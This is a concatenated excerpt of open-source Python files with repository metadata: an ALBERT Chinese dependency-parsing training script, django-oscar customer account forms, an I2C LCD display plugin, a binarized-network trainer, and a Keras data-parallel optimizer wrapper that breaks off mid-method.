] | 4 | 2021-09-17T15:23:31.000Z | 2022-02-28T10:18:04.000Z | stem_cell_hypothesis/zh_albert_base/single/dep.py | emorynlp/stem-cell-hypothesis | 48a628093d93d653865fbac6409d179cddd99293 | [
"Apache-2.0"
] | null | null | null | stem_cell_hypothesis/zh_albert_base/single/dep.py | emorynlp/stem-cell-hypothesis | 48a628093d93d653865fbac6409d179cddd99293 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2021-01-06 16:12
from typing import List
from elit.common.dataset import SortingSamplerBuilder
from elit.common.transform import NormalizeToken
from elit.components.mtl.multi_task_learning import MultiTaskLearning
from elit.components.mtl.tasks.constituency import CRFConstituencyParsing
from elit.components.mtl.tasks.dep import BiaffineDependencyParsing
from elit.components.mtl.tasks.ner.biaffine_ner import BiaffineNamedEntityRecognition
from elit.components.mtl.tasks.pos import TransformerTagging
from elit.components.mtl.tasks.srl.rank_srl import SpanRankingSemanticRoleLabeling
from elit.datasets.parsing.ptb import PTB_TOKEN_MAPPING
from elit.datasets.srl.ontonotes5.chinese import ONTONOTES5_POS_CHINESE_TRAIN, ONTONOTES5_POS_CHINESE_TEST, \
ONTONOTES5_POS_CHINESE_DEV, ONTONOTES5_CHINESE_TRAIN, ONTONOTES5_CHINESE_TEST, ONTONOTES5_CHINESE_DEV, \
ONTONOTES5_CON_CHINESE_TRAIN, ONTONOTES5_CON_CHINESE_DEV, ONTONOTES5_CON_CHINESE_TEST, ONTONOTES5_DEP_CHINESE_TEST, \
ONTONOTES5_DEP_CHINESE_DEV, ONTONOTES5_DEP_CHINESE_TRAIN
from elit.layers.embeddings.contextual_word_embedding import ContextualWordEmbedding
from elit.metrics.mtl import MetricDict
from elit.utils.log_util import cprint
from stem_cell_hypothesis import cdroot
def main():
    """Train and evaluate the single-task DEP model three times on Chinese
    OntoNotes with an ALBERT-base encoder, then print the per-run scores."""
    cdroot()
    scores: List[MetricDict] = []
    # Three independent runs with separate save dirs; scores collected below.
    for i in range(3):
        tasks = {
            # Other tasks kept (commented out) for ablation reference:
            # 'pos': TransformerTagging(
            #     ONTONOTES5_POS_CHINESE_TRAIN,
            #     ONTONOTES5_POS_CHINESE_DEV,
            #     ONTONOTES5_POS_CHINESE_TEST,
            #     SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
            #     lr=1e-3,
            # ),
            # 'ner': BiaffineNamedEntityRecognition(
            #     ONTONOTES5_CHINESE_TRAIN,
            #     ONTONOTES5_CHINESE_DEV,
            #     ONTONOTES5_CHINESE_TEST,
            #     SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
            #     lr=1e-3,
            #     doc_level_offset=True,
            # ),
            # 'srl': SpanRankingSemanticRoleLabeling(
            #     ONTONOTES5_CHINESE_TRAIN,
            #     ONTONOTES5_CHINESE_DEV,
            #     ONTONOTES5_CHINESE_TEST,
            #     SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
            #     lr=1e-3,
            #     doc_level_offset=True,
            # ),
            'dep': BiaffineDependencyParsing(
                ONTONOTES5_DEP_CHINESE_TRAIN,
                ONTONOTES5_DEP_CHINESE_DEV,
                ONTONOTES5_DEP_CHINESE_TEST,
                SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
                lr=1e-3,
            ),
            # 'con': CRFConstituencyParsing(
            #     ONTONOTES5_CON_CHINESE_TRAIN,
            #     ONTONOTES5_CON_CHINESE_DEV,
            #     ONTONOTES5_CON_CHINESE_TEST,
            #     SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
            #     lr=1e-3,
            # ),
        }
        mtl = MultiTaskLearning()
        save_dir = f'data/model/mtl/ontonotes_albert_base_dep_zh_{i}'
        cprint(f'Model will be saved in [cyan]{save_dir}[/cyan]')
        mtl.fit(
            ContextualWordEmbedding(
                'token',
                'voidful/albert_chinese_base',
                average_subwords=True,
                max_sequence_length=512,
                word_dropout=.2,
            ),
            tasks,
            save_dir,
            30,
            lr=1e-3,
            encoder_lr=5e-5,
            grad_norm=1,
            gradient_accumulation=1,
            eval_trn=False,
            transform=NormalizeToken(PTB_TOKEN_MAPPING, 'token'),
            # prefetch=10,
            # cache='data/tmp'
        )
        cprint(f'Model saved in [cyan]{save_dir}[/cyan]')
        mtl.load(save_dir)
        # Force well-formed (projective tree) outputs at evaluation time and
        # persist that setting alongside the model.
        if 'dep' in mtl.tasks:
            mtl['dep'].config.tree = True
            mtl['dep'].config.proj = True
        mtl.save_config(save_dir)
        # Re-attach the dataset paths, which are not restored by load().
        for k, v in mtl.tasks.items():
            v.trn = tasks[k].trn
            v.dev = tasks[k].dev
            v.tst = tasks[k].tst
        metric = mtl.evaluate(save_dir)[0]
        scores.append(metric)
    print(f'{"-".join(tasks.keys())} {len(scores)} runs scores:')
    for each in scores:
        cprint(each.cstr())
if __name__ == '__main__':
    import torch
    # torch.multiprocessing.set_start_method('spawn')  # See https://github.com/pytorch/pytorch/issues/40403
    main()
| 39.473684 | 121 | 0.625111 |
e3e7ec28a016ee91d719a0519faa7732691b69a1 | 15,723 | py | Python | src/oscar/apps/customer/forms.py | coderedcorp/django-oscar | 42856777fe34d88825280fd46b934ef9bb684fc5 | [
"BSD-3-Clause"
] | null | null | null | src/oscar/apps/customer/forms.py | coderedcorp/django-oscar | 42856777fe34d88825280fd46b934ef9bb684fc5 | [
"BSD-3-Clause"
] | 2 | 2019-03-13T16:15:54.000Z | 2019-07-04T18:53:37.000Z | src/oscar/apps/customer/forms.py | coderedcorp/django-oscar | 42856777fe34d88825280fd46b934ef9bb684fc5 | [
"BSD-3-Clause"
] | null | null | null | import string
from django import forms
from django.conf import settings
from django.contrib.auth import forms as auth_forms
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.password_validation import validate_password
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ValidationError
from django.utils.crypto import get_random_string
from django.utils.http import is_safe_url
from django.utils.translation import gettext_lazy as _
from django.utils.translation import pgettext_lazy
from oscar.apps.customer.utils import get_password_reset_url, normalise_email
from oscar.core.compat import (
existing_user_fields, get_user_model)
from oscar.core.decorators import deprecated
from oscar.core.loading import get_class, get_model, get_profile_class
from oscar.forms import widgets
Dispatcher = get_class('customer.utils', 'Dispatcher')
CommunicationEventType = get_model('customer', 'communicationeventtype')
ProductAlert = get_model('customer', 'ProductAlert')
User = get_user_model()
def generate_username():
    """Return a random 30-character username (letters, digits and underscore)
    that no existing user already has."""
    letters = string.ascii_letters
    allowed_chars = letters + string.digits + '_'
    # Loop instead of recursing: repeated collisions (however unlikely) can
    # no longer grow the call stack, and exists() avoids fetching the row.
    while True:
        uname = get_random_string(length=30, allowed_chars=allowed_chars)
        if not User.objects.filter(username=uname).exists():
            return uname
class PasswordResetForm(auth_forms.PasswordResetForm):
    """
    This form takes the same structure as its parent from django.contrib.auth
    """
    communication_type_code = "PASSWORD_RESET"

    def save(self, domain_override=None, use_https=False, request=None,
             **kwargs):
        """
        Generates a one-use only link for resetting password and sends to the
        user.
        """
        site = get_current_site(request)
        if domain_override is not None:
            site.domain = site.name = domain_override
        email = self.cleaned_data['email']
        # Only active accounts get an email; inactive ones are silently
        # skipped so the form leaks nothing about account state.
        active_users = User._default_manager.filter(
            email__iexact=email, is_active=True)
        for user in active_users:
            reset_url = self.get_reset_url(site, request, user, use_https)
            ctx = {
                'user': user,
                'site': site,
                'reset_url': reset_url}
            # Render and dispatch via the CommunicationEventType machinery so
            # the email content stays editable from the dashboard.
            messages = CommunicationEventType.objects.get_and_render(
                code=self.communication_type_code, context=ctx)
            Dispatcher().dispatch_user_messages(user, messages)

    def get_reset_url(self, site, request, user, use_https):
        """Build the absolute password-reset URL for *user* on *site*."""
        # the request argument isn't used currently, but implementors might
        # need it to determine the correct subdomain
        reset_url = "%s://%s%s" % (
            'https' if use_https else 'http',
            site.domain,
            get_password_reset_url(user))
        return reset_url
@deprecated
class SetPasswordForm(auth_forms.SetPasswordForm):
    """
    Deprecated - use django.contrib.auth.forms.SetPasswordForm instead.
    """
    # Intentionally empty: all behaviour comes from the django.contrib.auth
    # parent; the @deprecated decorator only warns callers to migrate.
    pass
@deprecated
class PasswordChangeForm(auth_forms.PasswordChangeForm):
    """
    Deprecated - use django.contrib.auth.forms.PasswordChangeForm instead.
    """
    # Intentionally empty: all behaviour comes from the django.contrib.auth
    # parent; the @deprecated decorator only warns callers to migrate.
    pass
class EmailAuthenticationForm(AuthenticationForm):
    """
    Extends the standard django AuthenticationForm, to support 75 character
    usernames. 75 character usernames are needed to support the EmailOrUsername
    auth backend.
    """
    username = forms.EmailField(label=_('Email address'))
    redirect_url = forms.CharField(
        widget=forms.HiddenInput, required=False)

    def __init__(self, host, *args, **kwargs):
        # host is kept so clean_redirect_url can reject redirects pointing
        # off-site (open-redirect protection).
        self.host = host
        super().__init__(*args, **kwargs)

    def clean_redirect_url(self):
        url = self.cleaned_data['redirect_url'].strip()
        if url and is_safe_url(url, self.host):
            return url
        # Implicitly returns None for missing or unsafe URLs, so callers fall
        # back to their own default redirect.
class ConfirmPasswordForm(forms.Form):
    """Ask an already-authenticated user to re-enter their password.

    Validation fails unless the submitted password matches the password of
    the user passed to the constructor.
    """
    password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)

    def __init__(self, user, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.user = user

    def clean_password(self):
        candidate = self.cleaned_data['password']
        if self.user.check_password(candidate):
            return candidate
        raise forms.ValidationError(
            _("The entered password is not valid!"))
class EmailUserCreationForm(forms.ModelForm):
    """Registration form: creates a user keyed by email address, with a
    generated username when the user model still requires one."""
    email = forms.EmailField(label=_('Email address'))
    password1 = forms.CharField(
        label=_('Password'), widget=forms.PasswordInput)
    password2 = forms.CharField(
        label=_('Confirm password'), widget=forms.PasswordInput)
    redirect_url = forms.CharField(
        widget=forms.HiddenInput, required=False)

    class Meta:
        model = User
        fields = ('email',)

    def __init__(self, host=None, *args, **kwargs):
        # host is kept so clean_redirect_url can validate that the post-signup
        # redirect stays on this site.
        self.host = host
        super().__init__(*args, **kwargs)

    def clean_email(self):
        """
        Checks for existing users with the supplied email address.
        """
        email = normalise_email(self.cleaned_data['email'])
        if User._default_manager.filter(email__iexact=email).exists():
            raise forms.ValidationError(
                _("A user with that email address already exists"))
        return email

    def clean_password2(self):
        # Both passwords must match, and the confirmed value must satisfy the
        # configured Django password validators.
        password1 = self.cleaned_data.get('password1', '')
        password2 = self.cleaned_data.get('password2', '')
        if password1 != password2:
            raise forms.ValidationError(
                _("The two password fields didn't match."))
        validate_password(password2, self.instance)
        return password2

    def clean_redirect_url(self):
        url = self.cleaned_data['redirect_url'].strip()
        if url and is_safe_url(url, self.host):
            return url
        # Unsafe or missing URL: fall back to the configured login redirect.
        return settings.LOGIN_REDIRECT_URL

    def save(self, commit=True):
        user = super().save(commit=False)
        user.set_password(self.cleaned_data['password1'])

        # Older user models still have a username column; fill it with a
        # random unique value since we authenticate by email.
        if 'username' in [f.name for f in User._meta.fields]:
            user.username = generate_username()
        if commit:
            user.save()
        return user
class OrderSearchForm(forms.Form):
    """Search form for filtering a customer's order history by date range
    and/or (partial) order number."""
    date_from = forms.DateField(
        required=False, label=pgettext_lazy("start date", "From"),
        widget=widgets.DatePickerInput())
    date_to = forms.DateField(
        required=False, label=pgettext_lazy("end date", "To"),
        widget=widgets.DatePickerInput())
    order_number = forms.CharField(required=False, label=_("Order number"))

    def clean(self):
        # Require at least one criterion, otherwise the search would simply
        # match every order.
        if self.is_valid() and not any([self.cleaned_data['date_from'],
                                        self.cleaned_data['date_to'],
                                        self.cleaned_data['order_number']]):
            raise forms.ValidationError(_("At least one field is required."))
        return super().clean()

    def description(self):
        """
        Uses the form's data to build a useful description of what orders
        are listed.
        """
        if not self.is_bound or not self.is_valid():
            return _('All orders')
        else:
            date_from = self.cleaned_data['date_from']
            date_to = self.cleaned_data['date_to']
            order_number = self.cleaned_data['order_number']
            return self._orders_description(date_from, date_to, order_number)

    def _orders_description(self, date_from, date_to, order_number):
        # Pick the translatable template matching the combination of criteria
        # that were actually supplied, then interpolate the values.
        if date_from and date_to:
            if order_number:
                desc = _('Orders placed between %(date_from)s and '
                         '%(date_to)s and order number containing '
                         '%(order_number)s')
            else:
                desc = _('Orders placed between %(date_from)s and '
                         '%(date_to)s')
        elif date_from:
            if order_number:
                desc = _('Orders placed since %(date_from)s and '
                         'order number containing %(order_number)s')
            else:
                desc = _('Orders placed since %(date_from)s')
        elif date_to:
            if order_number:
                desc = _('Orders placed until %(date_to)s and '
                         'order number containing %(order_number)s')
            else:
                desc = _('Orders placed until %(date_to)s')
        elif order_number:
            desc = _('Orders with order number containing %(order_number)s')
        else:
            # No criteria at all (clean() normally prevents this).
            return None
        params = {
            'date_from': date_from,
            'date_to': date_to,
            'order_number': order_number,
        }
        return desc % params

    def get_filters(self):
        """Translate the cleaned form data into ORM filter kwargs."""
        date_from = self.cleaned_data['date_from']
        date_to = self.cleaned_data['date_to']
        order_number = self.cleaned_data['order_number']
        kwargs = {}
        if date_from and date_to:
            kwargs['date_placed__range'] = [date_from, date_to]
        elif date_from and not date_to:
            kwargs['date_placed__gt'] = date_from
        elif not date_from and date_to:
            kwargs['date_placed__lt'] = date_to
        if order_number:
            kwargs['number__contains'] = order_number
        return kwargs
class UserForm(forms.ModelForm):
    """Profile-edit form for the core user fields (name and email)."""

    def __init__(self, user, *args, **kwargs):
        self.user = user
        kwargs['instance'] = user
        super().__init__(*args, **kwargs)
        if 'email' in self.fields:
            self.fields['email'].required = True

    def clean_email(self):
        """
        Make sure that the email address is always unique as it is
        used instead of the username. This is necessary because the
        unique-ness of email addresses is *not* enforced on the model
        level in ``django.contrib.auth.models.User``.
        """
        email = normalise_email(self.cleaned_data['email'])
        # Exclude the user being edited so keeping one's own email validates.
        if User._default_manager.filter(
                email__iexact=email).exclude(id=self.user.id).exists():
            raise ValidationError(
                _("A user with this email address already exists"))
        # Save the email unaltered
        return email

    class Meta:
        model = User
        fields = existing_user_fields(['first_name', 'last_name', 'email'])
# ProfileForm is the user-and-profile form when a profile class is configured,
# otherwise it degrades to the plain UserForm.
Profile = get_profile_class()
if Profile:  # noqa (too complex (12))

    class UserAndProfileForm(forms.ModelForm):
        """Combined form editing the Profile instance plus selected fields of
        the related user in a single submission."""

        def __init__(self, user, *args, **kwargs):
            try:
                instance = Profile.objects.get(user=user)
            except Profile.DoesNotExist:
                # User has no profile, try a blank one
                instance = Profile(user=user)
            kwargs['instance'] = instance

            super().__init__(*args, **kwargs)

            # Get profile field names to help with ordering later
            profile_field_names = list(self.fields.keys())

            # Get user field names (we look for core user fields first)
            core_field_names = set([f.name for f in User._meta.fields])
            user_field_names = ['email']
            for field_name in ('first_name', 'last_name'):
                if field_name in core_field_names:
                    user_field_names.append(field_name)
            user_field_names.extend(User._meta.additional_fields)

            # Store user fields so we know what to save later
            self.user_field_names = user_field_names

            # Add additional user form fields
            additional_fields = forms.fields_for_model(
                User, fields=user_field_names)
            self.fields.update(additional_fields)

            # Ensure email is required and initialised correctly
            self.fields['email'].required = True

            # Set initial values
            for field_name in user_field_names:
                self.fields[field_name].initial = getattr(user, field_name)

            # Ensure order of fields is email, user fields then profile fields
            self.fields.keyOrder = user_field_names + profile_field_names

        class Meta:
            model = Profile
            exclude = ('user',)

        def clean_email(self):
            email = normalise_email(self.cleaned_data['email'])

            # Exclude this form's own user so an unchanged email validates.
            users_with_email = User._default_manager.filter(
                email__iexact=email).exclude(id=self.instance.user.id)
            if users_with_email.exists():
                raise ValidationError(
                    _("A user with this email address already exists"))
            return email

        def save(self, *args, **kwargs):
            user = self.instance.user

            # Save user also
            for field_name in self.user_field_names:
                setattr(user, field_name, self.cleaned_data[field_name])
            user.save()

            return super().save(*args, **kwargs)

    ProfileForm = UserAndProfileForm
else:
    ProfileForm = UserForm
class ProductAlertForm(forms.ModelForm):
    """Sign-up form for 'back in stock' alerts on a product, for both
    authenticated and anonymous users."""
    email = forms.EmailField(required=True, label=_('Send notification to'),
                             widget=forms.TextInput(attrs={
                                 'placeholder': _('Enter your email')
                             }))

    def __init__(self, user, product, *args, **kwargs):
        self.user = user
        self.product = product
        super().__init__(*args, **kwargs)

        # Only show email field to unauthenticated users
        if user and user.is_authenticated:
            self.fields['email'].widget = forms.HiddenInput()
            self.fields['email'].required = False

    def save(self, commit=True):
        alert = super().save(commit=False)
        if self.user.is_authenticated:
            alert.user = self.user
        alert.product = self.product
        if commit:
            alert.save()
        return alert

    def clean(self):
        cleaned_data = self.cleaned_data
        email = cleaned_data.get('email')
        if email:
            # Anonymous sign-up: reject a duplicate active alert for the same
            # product/email pair.
            try:
                ProductAlert.objects.get(
                    product=self.product, email__iexact=email,
                    status=ProductAlert.ACTIVE)
            except ProductAlert.DoesNotExist:
                pass
            else:
                raise forms.ValidationError(_(
                    "There is already an active stock alert for %s") % email)
            # Check that the email address hasn't got other unconfirmed alerts.
            # If they do then we don't want to spam them with more until they
            # have confirmed or cancelled the existing alert.
            if ProductAlert.objects.filter(email__iexact=email,
                                           status=ProductAlert.UNCONFIRMED).count():
                raise forms.ValidationError(_(
                    "%s has been sent a confirmation email for another product "
                    "alert on this site. Please confirm or cancel that request "
                    "before signing up for more alerts.") % email)
        elif self.user.is_authenticated:
            # Authenticated users may hold at most one active alert per product.
            try:
                ProductAlert.objects.get(product=self.product,
                                         user=self.user,
                                         status=ProductAlert.ACTIVE)
            except ProductAlert.DoesNotExist:
                pass
            else:
                raise forms.ValidationError(_(
                    "You already have an active alert for this product"))
        return cleaned_data

    class Meta:
        model = ProductAlert
        fields = ['email']
| 36.65035 | 84 | 0.614132 |
eb9d38220ad68777d0f10a5f1c841409c88c9d81 | 3,442 | py | Python | platypush/plugins/lcd/i2c.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | platypush/plugins/lcd/i2c.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | platypush/plugins/lcd/i2c.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | from typing import Optional
from platypush.plugins.lcd import LcdPlugin
class LcdI2cPlugin(LcdPlugin):
    """
    Plugin to write to an LCD display connected via I2C.
    Adafruit I2C/SPI LCD Backback is supported.

    Warning: You might need a level shifter (that supports i2c)
    between the SCL/SDA connections on the MCP chip / backpack and the Raspberry Pi.
    Or you might damage the Pi and possibly any other 3.3V i2c devices
    connected on the i2c bus. Or cause reliability issues. The SCL/SDA are rated 0.7*VDD
    on the MCP23008, so it needs 3.5V on the SCL/SDA when 5V is applied to drive the LCD.

    The MCP23008 and MCP23017 needs to be connected exactly the same way as the backpack.

    For complete schematics see the adafruit page at:
    https://learn.adafruit.com/i2c-spi-lcd-backpack/

    4-bit operation. I2C only supported.

    Pin mapping::

        7 | 6 | 5 | 4 | 3 | 2 | 1 | 0
        BL | D7 | D6 | D5 | D4 | E | RS | -

    Requires:

        * **RPLCD** (``pip install RPLCD``)
        * **RPi.GPIO** (``pip install RPi.GPIO``)

    """

    def __init__(self, i2c_expander: str, address: int,
                 expander_params: Optional[dict] = None,
                 port: int = 1, cols: int = 16, rows: int = 2,
                 backlight_enabled: bool = True,
                 dotsize: int = 8, charmap: str = 'A02',
                 auto_linebreaks: bool = True, **kwargs):
        """
        :param i2c_expander: Set your I²C chip type. Supported: "PCF8574", "MCP23008", "MCP23017".
        :param address: The I2C address of your LCD.
        :param expander_params: Parameters for expanders, in a dictionary. Only needed for MCP23017
            gpio_bank - This must be either ``A`` or ``B``. If you have a HAT, A is usually marked 1 and B is 2.
            Example: ``expander_params={'gpio_bank': 'A'}``
        :param port: The I2C port number. Default: ``1``.
        :param cols: Number of columns per row (usually 16 or 20). Default: ``16``.
        :param rows: Number of display rows (usually 1, 2 or 4). Default: ``2``.
        :param backlight_enabled: Whether the backlight is enabled initially. Default: ``True``. Has no effect if pin_backlight is ``None``
        :param dotsize: Some 1 line displays allow a font height of 10px. Allowed: ``8`` or ``10``. Default: ``8``.
        :param charmap: The character map used. Depends on your LCD. This must be either ``A00`` or ``A02`` or ``ST0B``. Default: ``A02``.
        :param auto_linebreaks: Whether or not to automatically insert line breaks. Default: ``True``.
        """
        super().__init__(**kwargs)

        # Connection parameters are stored verbatim and only consumed lazily
        # by _get_lcd(), so constructing the plugin never touches the I2C bus.
        self.i2c_expander = i2c_expander
        self.address = address
        self.expander_params = expander_params or {}
        self.port = port
        self.cols = cols
        self.rows = rows
        self.backlight_enabled = backlight_enabled
        self.dotsize = dotsize
        self.auto_linebreaks = auto_linebreaks
        self.charmap = charmap

    def _get_lcd(self):
        """Instantiate and return the RPLCD ``CharLCD`` from the stored settings."""
        from RPLCD.i2c import CharLCD

        # Bug fix: expander_params was stored but never forwarded, so e.g. the
        # MCP23017 'gpio_bank' setting was silently ignored.
        return CharLCD(cols=self.cols, rows=self.rows,
                       i2c_expander=self.i2c_expander,
                       expander_params=self.expander_params,
                       address=self.address, port=self.port,
                       backlight_enabled=self.backlight_enabled,
                       dotsize=self.dotsize, charmap=self.charmap,
                       auto_linebreaks=self.auto_linebreaks)
# vim:sw=4:ts=4:et:
| 44.701299 | 140 | 0.620569 |
542587b7e30d26597562fb605d86bbaa45eb3584 | 5,265 | py | Python | trainer2.py | YuanshengZhao/adiabaticbinary | 2db98957e3d570a3d4fa94d25aed65810576b898 | [
"MIT"
] | null | null | null | trainer2.py | YuanshengZhao/adiabaticbinary | 2db98957e3d570a3d4fa94d25aed65810576b898 | [
"MIT"
] | null | null | null | trainer2.py | YuanshengZhao/adiabaticbinary | 2db98957e3d570a3d4fa94d25aed65810576b898 | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
class Trainer(object):
    """Adiabatic-binarization trainer.

    Gradually sharpens the model's binarization parameters — read/written via
    ``model.get_kk``/``set_kk`` (used when mode includes weights, 'w'/'b') and
    ``model.get_ka``/``set_ka`` (activations, 'a'/'b') — while tracking the
    best fully-binarized (k set to 1e5) validation accuracy.
    """

    def __init__(self, same_wts_ep, mode="b"):
        self.binbest=0.0              # best binarized validation accuracy seen so far
        self.same_wts_ep=same_wts_ep  # epochs to wait before pushing k again
        self.sw_epc=0                 # epochs since the last push
        self.tot_sw=0                 # epochs since the last binbest improvement
        self.mode=mode                # "w" weights, "a" activations, "b" both
        self.pmode="a" if mode=="a" else "w"  # which parameter to push next
        self.prto=1.5                 # multiplicative push factor for kk/ka
        self.maxpush=3                # max consecutive pushes per push phase
        self.lr_power=0.3             # lr decay exponent w.r.t. kk (or ka)
        self.lr_base=1.0              # reference k value for the lr schedule
        self.val_bs=125               # batch size for fit/evaluate
        self.reduction=.8             # shrink factor for sw_epc after a push
        self.break_r=3 #must > 2      # stop after same_wts_ep*break_r epochs with no binbest gain
        self.bchange=-1 #change mode every time

    def refresh(self):
        """Reset the best score and the epoch counters (e.g. before a new run)."""
        self.binbest=0.0
        self.sw_epc=0
        self.tot_sw=0

    def train(self, model, datagen, x_tr,y_tr, x_val, y_val, max_epochs, lnr, save_header, clear_optz, x_test, y_test):
        """Run the annealing loop: train one epoch at a time, checkpoint,
        score the fully-binarized model, and periodically push kk/ka."""
        same_push=0
        for epoch_i in range(max_epochs):
            # Learning rate decays as the relevant k grows (lnr / (k/base)^power).
            if(self.mode=="w"):
                model.optimizer.learning_rate.assign(lnr/(model.get_kk()/self.lr_base)**self.lr_power)
            else:
                model.optimizer.learning_rate.assign(lnr/(model.get_ka()/self.lr_base)**self.lr_power)
            self.sw_epc += 1
            self.tot_sw +=1
            print("epoch",epoch_i+1, "sw",self.sw_epc, self.tot_sw, "mxep",max_epochs, "lr",model.optimizer.learning_rate.numpy(), "bb",self.binbest)
            if(datagen is not None):
                rst=model.fit(datagen.flow(x_tr,y_tr,batch_size=self.val_bs),
                    epochs=1, validation_data=(x_val,y_val), validation_batch_size=self.val_bs, verbose=2)
            else:
                rst=model.fit(x_tr,y_tr,batch_size=self.val_bs,
                    epochs=1, validation_data=(x_val,y_val), validation_batch_size=self.val_bs, verbose=2)
            #save_weights
            if (self.mode=="b"):
                fmn=save_header+"_w%0.1f_a%0.1f.npz"%(model.get_kk().numpy(),model.get_ka().numpy())
            elif (self.mode=="w"):
                fmn=save_header+"_w%0.1f.npz"%(model.get_kk().numpy())
            else:
                fmn=save_header+"_a%0.1f.npz"%(model.get_ka().numpy())
            wtsn=model.get_weights()
            np.savez(fmn,*wtsn)
            vala=rst.history['val_accuracy'][0]
            #test on binary
            # Temporarily set k to 1e5 (effectively a hard sign function),
            # evaluate, then restore the annealed values afterwards.
            if (self.mode=="b" or self.mode=="w"):
                kk_now=tf.identity(model.get_kk().numpy())
                model.set_kk(1e5)
            if (self.mode=="b" or self.mode=="a"):
                ka_now=tf.identity(model.get_ka().numpy())
                model.set_ka(1e5)
            vbin=model.evaluate(x_val,y_val, verbose=0, batch_size=self.val_bs)[1]
            if(self.binbest < vbin):
                self.binbest=vbin
                self.sw_epc = self.tot_sw = 0
                same_push=100 # nextpush will change
                np.savez(save_header + self.mode + "_Best.npz",*wtsn)
                if(x_test is not None):
                    print("\033[94mtest perf: ",end="")
                    model.evaluate(x_test, y_test, verbose=2, batch_size=self.val_bs)
                    print("\033[0m",end="")
            if (self.mode=="b" or self.mode=="w"):
                model.set_kk(kk_now)
            if (self.mode=="b" or self.mode=="a"):
                model.set_ka(ka_now)
            if (self.mode=="b" or self.mode=="w"):
                print("kk=",model.get_kk().numpy(),end=" ")
            if (self.mode=="b" or self.mode=="a"):
                print("ka=",model.get_ka().numpy(),end=" ")
            print("val_acc=",vala,"bin_acc=",vbin)
            # Early stop: no binarized-accuracy improvement for too long.
            if(self.tot_sw>=self.same_wts_ep*self.break_r):
                break
            #push kk and ka
            if(self.sw_epc>=self.same_wts_ep):
                # In mode "b", alternate which parameter (kk or ka) gets pushed.
                if(self.mode=="b" and same_push>=self.bchange):
                    self.pmode="a" if self.pmode=="w" else "w"
                    same_push=0
                else:
                    same_push+=1
                # Multiply k by prto up to maxpush times, stopping early if the
                # validation accuracy drops or k is already saturated.
                if(self.pmode=="w"):
                    for _ in range(self.maxpush):
                        model.set_kk(model.get_kk() * self.prto)
                        vala1=model.evaluate(x_val,y_val,verbose=0,batch_size=self.val_bs)[1]
                        print("push kk to",model.get_kk().numpy(),"acc=",vala1)
                        if(vala1<vala or model.get_kk()>1e3):
                            break
                else:
                    for _ in range(self.maxpush):
                        model.set_ka(model.get_ka() * self.prto)
                        vala1=model.evaluate(x_val,y_val,verbose=0,batch_size=self.val_bs)[1]
                        print("push ka to",model.get_ka().numpy(),"acc=",vala1)
                        if(vala1<vala or model.get_ka()>1e3):
                            break
                self.sw_epc=int(self.sw_epc*self.reduction)
                # Optionally reset optimizer state (e.g. momenta) after a push.
                if(clear_optz):
                    for vari in model.optimizer.variables():
                        vari.assign(tf.zeros_like(vari))
                # Stop once either parameter is saturated past 1e3.
                if (self.mode=="b" or self.mode=="w"):
                    if (model.get_kk().numpy()>1e3):
                        break
                if (self.mode=="b" or self.mode=="a"):
                    if (model.get_ka().numpy()>1e3):
                        break
5bb40c044702dfe8fd4e4e33915bf996bfeef9eb | 7,404 | py | Python | data_parallel_model.py | winwinJJiang/keras_multi_gpu_training | d156237217c54ba618c73c300f22e332f6b23b0e | [
"MIT"
] | 76 | 2017-08-10T13:17:40.000Z | 2021-12-20T19:28:41.000Z | data_parallel_model.py | winwinJJiang/keras_multi_gpu_training | d156237217c54ba618c73c300f22e332f6b23b0e | [
"MIT"
] | 8 | 2017-08-10T13:04:20.000Z | 2019-06-09T10:17:15.000Z | data_parallel_model.py | winwinJJiang/keras_multi_gpu_training | d156237217c54ba618c73c300f22e332f6b23b0e | [
"MIT"
] | 20 | 2017-08-31T12:50:46.000Z | 2021-12-20T19:28:41.000Z | import keras.backend as K
from keras.layers import Lambda
from keras.layers.merge import concatenate
from keras.models import Model
import keras.optimizers
from keras.optimizers import clip_norm, Optimizer
import tensorflow as tf
# this should be fairly ready
class DataParallelOptimizer(Optimizer):
    """
    Wrapper class for data-parallel optimization. Multiple model replicas
    (towers) with shared weights operate on different batch slices and compute
    gradients in parallel on multiple GPUs. Gradients are then averaged on
    parameter sever (CPU or one of GPUs) and weights updated.

    It accepts a list of losses (living on separate devices) instead of a
    single loss, computes gradients (collocated with losses) for each loss,
    averages then on the PS device and provides weight update operations.

    Usage:

    from keras.optimizers import Adam
    model.compile(..., optimizer=DataParallelOptimizer(Adam()))
    """

    def __init__(self, optimizer):
        # NOTE: super().__init__() is deliberately not called; all optimizer
        # state lives in the wrapped optimizer and this class only delegates.
        self.optimizer = keras.optimizers.get(optimizer)

    def get_gradients(self, losses, params):
        """Compute and combine gradients for one loss per tower.

        Args:
            losses: a single loss tensor, or a list with one loss per model
                replica, each placed on its own device.
            params: list of trainable variables.

        Returns:
            The combined gradients, optionally clipped by norm/value.
        """
        # NOTE: argument "losses" (list) instead of a single "loss"
        if isinstance(losses, list):
            # Gradients for each tower loss.
            # NOTE: K.gradients call tf.gradiens with
            # colocate_gradients_with_ops=True, thus each tf.gradient operation
            # should be collocated with it's respective loss. We assume losses
            # to be located at different devices.
            tower_grads = [K.gradients(loss, params) for loss in losses]
            # Average gradients.
            # This should be a synchronization point (for sync SGD) and this
            # operation will be located according to the scope where the main
            # Model was defined - should be the parameter server device.
            # NOTE(review): this reduces the stacked tower gradients to a
            # single mean rather than a per-parameter mean across towers --
            # confirm the intended semantics before relying on it.
            grads = K.mean(K.stack(tower_grads, 0))
        else:
            grads = K.gradients(losses, params)
        if hasattr(self, 'clipnorm') and self.clipnorm > 0:
